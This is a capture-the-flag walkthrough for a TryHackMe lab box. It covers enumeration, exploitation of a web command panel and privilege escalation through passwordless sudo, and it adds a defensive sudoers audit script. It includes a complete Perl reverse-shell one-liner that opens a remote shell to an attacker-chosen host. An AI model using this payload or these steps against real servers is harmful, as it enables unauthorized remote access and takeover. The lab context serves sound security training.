Pickle Rick CTF Walkthrough - TryHackMe

A Rick and Morty CTF. Help turn Rick back into a human!

Rick turned into a pickle

What happened Rick?

We need to save Rick

This is a Rick and Morty themed challenge, and we play Morty. We have to exploit a web server to find 3 ingredients that will help Rick make the potion that transforms him from a pickle back into a human. Let’s use our hacking superpower, hack the web server and save Rick.

Room link: https://tryhackme.com/room/picklerick

Launch the box and let’s enumerate the IP given.

Use: nmap -sC -sV -A machine_ip

  • nmap -> the Network Mapper tool
  • -sC -> default script scanning
  • -sV -> version detection
fig 1. nmap result

We can see that ports 22 and 80 are open. Port 22 is for SSH (Secure Shell) and port 80 is for HTTP. Let’s go to the browser, paste the IP there and check what is waiting for us.

fig 2. The website

Let’s spend some time enumerating this website. Let’s view the source code.

fig 3. A user name found

A user name is found here. Let’s do directory enumeration and check the other directories as well.

Use: gobuster dir -u machine_ip -w wordlist_path

  • gobuster -> tool
  • dir -> directory enumeration mode
  • -w -> specify wordlist path
fig 4. Gobuster

The results show that there are many directories. Let’s open them one by one.

fig 5. /assets
fig 6. /robots.txt

Here we got a password.

fig 7. /login.php

Let’s try the password and user name that we now have in hand.

fig 8. login.php

I simply viewed the source code of this logged in page and found something interesting.

fig 9. source code of login.php

I guess we have a base64 encrypted password. Let’s go to CyberChef to crack it.

fig 10. A rabbit hole

I had to do the decryption almost 9 times to understand it was a rabbit hole, but that’s OK. Keep moving forward; we need to save Rick.

Don’t worry Rick, Morty to the rescue

Let’s check the logged in page.

Wait, that’s strange! Why is it showing a command panel here? Let’s execute some basic commands and see.

fig 11. logged in page

This page has a command execution vulnerability. Let’s try some more commands.

fig 12. executing commands
fig 13. attempt failed

It seems our commands are being sanitized, which means the command is not executed; it is simply discarded instead of being run on the server.

Got another idea. We shall take a reverse shell from here. I used a Perl reverse shell code.

Use: perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Listen on the port that was set.

fig 14. listening to port 1234

Execute the command in the website and get the shell as shown below (fig 15).

fig 15. shell created successfully

Now let’s execute some commands in the /var/www/html directory.

fig 16. First secret ingredient found

Now let’s move around the server and find the other two secret ingredients.

Let’s go to the /home directory and search.

fig 17. second secret ingredient found

We are one step away from saving Rick.

Use: sudo -l

fig 18. something fishy

We found something very interesting: we can run everything with sudo without a password.

Time for privilege escalation.

Use: sudo su

fig 19. Third secret ingredient found

We finally saved Rick.
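
The passwordless sudo rule that sudo -l revealed is what made the last step trivial, and it is easy to audit for. The script below is an added example, not part of the original walkthrough: it flags sudoers rules that allow ALL commands with NOPASSWD. The sample policy and its account names are constructed, and it assumes one rule per line with no commas inside a (runas) list.

```shell
#!/bin/sh
# Added example: flag sudoers rules that allow every command without a password.
# Reads sudoers-format text on stdin, prints "<who>: <finding>" per risky rule.
# Assumptions: one rule per line (no backslash continuations), no commas
# inside a (runas) list, and every "#" line is treated as a comment.
audit_sudoers() {
    awk '
    /^[ \t]*(#|$)/ { next }                          # comments and blank lines
    /^[ \t]*(Defaults|[A-Za-z]+_Alias)/ { next }     # settings and aliases
    {
        eq = index($0, "=")
        if (eq == 0) next                            # not a user specification
        who = $1
        nopass = 0                                   # NOPASSWD carries forward
        n = split(substr($0, eq + 1), cmd, ",")
        for (i = 1; i <= n; i++) {
            c = cmd[i]
            gsub(/^[ \t]+|[ \t]+$/, "", c)
            sub(/^\([^)]*\)[ \t]*/, "", c)           # drop a leading (runas)
            while (match(c, /^[A-Z_]+:[ \t]*/)) {    # peel tags such as NOPASSWD:
                tag = substr(c, 1, RLENGTH)
                if (tag ~ /^NOPASSWD:/) nopass = 1
                if (tag ~ /^PASSWD:/)   nopass = 0
                c = substr(c, RLENGTH + 1)
            }
            if (nopass && c == "ALL") {
                print who ": passwordless sudo for ALL commands"
                break
            }
        }
    }'
}

# Constructed sample policy; the account names are hypothetical.
sample_sudoers() {
    cat <<'EOF'
# constructed sudoers sample
Defaults env_reset
root     ALL=(ALL:ALL) ALL
webuser  ALL=(ALL) NOPASSWD: ALL
%admin   ALL=(ALL) ALL
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
EOF
}

sample_sudoers | audit_sudoers
```

On a real host an administrator would feed it the policy files as root, for example cat /etc/sudoers /etc/sudoers.d/* | audit_sudoers. A service account that runs a web application should appear in that output for no rule at all.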

Summary

  1. Basic enumeration done: ports 22 and 80 open.
  2. We did directory enumeration on the website.
  3. The website had a command execution vulnerability.
  4. We took a reverse shell using Perl code.
  5. We could switch user without a password.
  6. We did sudo su to switch user and captured the flags.
